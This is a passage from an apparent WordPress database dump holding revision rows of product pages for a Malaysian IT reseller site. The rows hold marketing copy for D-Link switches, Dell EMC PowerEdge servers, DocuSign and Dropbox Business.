(SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>Â </p><center>[maxbutton id=\"6\" ]</center><p>Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:38:04','2019-09-25 07:38:04','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3429,1,'2019-09-25 15:42:11','2019-09-25 07:42:11','<h2 class=\"heading\">Servers built for today\'s most demanding workloads and tomorrow\'s.</h2>\r\n<div class=\"rte \">\r\n\r\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\r\n\r\n&amp;nbsp;\r\n<h3>Rack Servers</h3>\r\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\r\n<ul>\r\n 	<li>World record in SAP performance11</li>\r\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\r\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\r\n 	<li>#1 in price/performance (R740xd)24</li>\r\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\r\n</ul>\r\n&amp;nbsp;\r\n<h3>Modular Infrastructure</h3>\r\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\r\n<ul>\r\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\r\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\r\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\r\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\r\n</ul>\r\n&amp;nbsp;\r\n<h3>Tower Servers</h3>\r\nPowerEdge tower servers are designed to grow with your organization, at your pace.\r\n<ul>\r\n 	<li>Flexible configurations with large internal capacities</li>\r\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\r\n 	<li>Rackable for continued use as companies grow</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&amp;nbsp;\r\n<h3>Systems Management Software</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\r\n<ul class=\"server-list\">\r\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\r\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\r\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&amp;nbsp;\r\n<h3 class=\"title\">Industrial-Grade Servers</h3>\r\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\r\n<ul class=\"server-list\">\r\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\r\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\r\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\r\n</ul>\r\n</div>\r\n&nbsp;\r\n\r\n&amp;nbsp;\r\n<h3>Ready Nodes</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nBuild or scale with PowerEdge servers pre-configured for your workloads.\r\n<ul class=\"server-list\">\r\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\r\n 	<li>Save time on configuration and testing</li>\r\n 	<li>Solution-level customer support included</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2019-09-25 15:42:11','2019-09-25 07:42:11','',1478,'https://bintara.com.my/blog/2019/09/25/1478-revision-v1/',0,'revision','',0),(3430,1,'2019-09-25 15:43:40','2019-09-25 07:43:40','<h2 class=\"heading\">Servers built for today\'s most demanding workloads and tomorrow\'s.</h2>\r\n<div class=\"rte \">\r\n\r\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\r\n\r\nnbsp;\r\n<h3>Rack Servers</h3>\r\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\r\n<ul>\r\n 	<li>World record in SAP performance11</li>\r\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\r\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\r\n 	<li>#1 in price/performance (R740xd)24</li>\r\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Modular Infrastructure</h3>\r\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\r\n<ul>\r\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\r\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\r\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\r\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Tower Servers</h3>\r\nPowerEdge tower servers are designed to grow with your organization, at your pace.\r\n<ul>\r\n 	<li>Flexible configurations with large internal capacities</li>\r\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\r\n 	<li>Rackable for continued use as companies grow</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3>Systems Management Software</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\r\n<ul class=\"server-list\">\r\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\r\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\r\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3 class=\"title\">Industrial-Grade Servers</h3>\r\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\r\n<ul class=\"server-list\">\r\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\r\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\r\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\r\n</ul>\r\n</div>\r\n\r\n\r\n&nbsp;\r\n<h3>Ready Nodes</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nBuild or scale with PowerEdge servers pre-configured for your workloads.\r\n<ul class=\"server-list\">\r\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\r\n 	<li>Save time on configuration and testing</li>\r\n 	<li>Solution-level customer support included</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2019-09-25 15:43:40','2019-09-25 07:43:40','',1478,'https://bintara.com.my/blog/2019/09/25/1478-revision-v1/',0,'revision','',0),(3431,1,'2019-09-25 15:44:12','2019-09-25 07:44:12','<h2 class=\"heading\">Servers built for today\'s most demanding workloads and tomorrow\'s.</h2>\r\n<div class=\"rte \">\r\n\r\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\r\n\r\n&nbsp;\r\n<h3>Rack Servers</h3>\r\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\r\n<ul>\r\n 	<li>World record in SAP performance11</li>\r\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\r\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\r\n 	<li>#1 in price/performance (R740xd)24</li>\r\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Modular Infrastructure</h3>\r\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\r\n<ul>\r\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\r\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\r\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\r\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Tower Servers</h3>\r\nPowerEdge tower servers are designed to grow with your organization, at your pace.\r\n<ul>\r\n 	<li>Flexible configurations with large internal capacities</li>\r\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\r\n 	<li>Rackable for continued use as companies grow</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3>Systems Management Software</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\r\n<ul class=\"server-list\">\r\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\r\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\r\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3 class=\"title\">Industrial-Grade Servers</h3>\r\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\r\n<ul class=\"server-list\">\r\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\r\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\r\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\r\n</ul>\r\n</div>\r\n\r\n\r\n&nbsp;\r\n<h3>Ready Nodes</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nBuild or scale with PowerEdge servers pre-configured for your workloads.\r\n<ul class=\"server-list\">\r\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\r\n 	<li>Save time on configuration and testing</li>\r\n 	<li>Solution-level customer support included</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2019-09-25 15:44:12','2019-09-25 07:44:12','',1478,'https://bintara.com.my/blog/2019/09/25/1478-revision-v1/',0,'revision','',0),(3432,1,'2019-09-25 15:50:17','2019-09-25 07:50:17','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h2>Sign. Send. Success.</h2><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h2>Modernize your System of Agreement</h2><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h2>Delight customers with an easier way to do business</h2><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><h2>DocuSign makes your business run better</h2><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes </strong>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong> DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-09-25 15:50:17','2019-09-25 07:50:17','',1481,'https://bintara.com.my/blog/2019/09/25/1481-revision-v1/',0,'revision','',0),(3434,1,'2019-09-25 16:17:12','2019-09-25 08:17:12','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\n\n&nbsp;\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\n<div class=\"c43-page-header-level-3-plank__text\">\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\n\n&nbsp;\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\n</div>\n</div>\n\n&nbsp;\n<h2>Features</h2>\n<strong>Flexible storage plans</strong>\nChoose the right plan to ensure your team has the space it needs to be productive.\n\n<strong>File and version recovery</strong>\nEasily recover deleted files and restore previous file versions.\n\n<strong>Team folder manager</strong>\nGet visibility and control over team folders, including sync management.\n\n<strong>Link permissions</strong>\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\n\n<strong>Dropbox Paper</strong>\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\n\n<strong>Smart Sync</strong>\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\n\n<strong>Admin dashboard</strong>\nMonitor team activity, view connected devices, and audit sharing activity.\n\n<strong>Account transfer tool</strong>\nEasily transfer files from one user to another when responsibilities change.\n\n<strong>Dropbox Showcase</strong>\nPresent work in a professionally-packaged page and track who engages with your files.\n\n<strong>Remote wipe</strong>\nClear files from lost or stolen devices to keep company files in the right hands.\n\n<strong>Third-party app integrations</strong>\nExtend the power of Dropbox with over 300,000 connected apps.\n\n<strong>Live support</strong>\nQuickly get answers to your questions via priority phone, email, and chat support.\n\n\n&nbsp;\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\n\n<strong>File backup</strong>\nGet the storage your business needs to share and collaborate seamlessly.\n\n<strong>Team collaboration</strong>\nStay productive with new ways to easily share work and collect feedback.\n\n<strong>Administrative tools</strong>\nTeam management stays simple from a central location, the admin console.\n\n<strong>Security features</strong>\nProtect sensitive company files with enterprise-grade security features.\n\n&nbsp;\n<center>[maxbutton id=\"1\" ]</center>','Dropbox','','inherit','closed','closed','','1473-autosave-v1','','','2019-09-25 16:17:12','2019-09-25 08:17:12','',1473,'https://bintara.com.my/blog/2019/09/25/1473-autosave-v1/',0,'revision','',0),(3436,1,'2019-09-25 16:09:08','2019-09-25 08:09:08','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:09:08','2019-09-25 08:09:08','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3437,1,'2019-09-25 16:09:46','2019-09-25 08:09:46','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:09:46','2019-09-25 08:09:46','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3440,1,'2019-09-25 16:13:00','2019-09-25 08:13:00','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h2>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n&nbsp;\r\n<h2>Features</h2>\r\n<strong>Flexible storage plans</strong>\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:13:00','2019-09-25 08:13:00','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(3438,1,'2019-09-25 16:10:37','2019-09-25 08:10:37','<img class=\"alignnone wp-image-1891\" 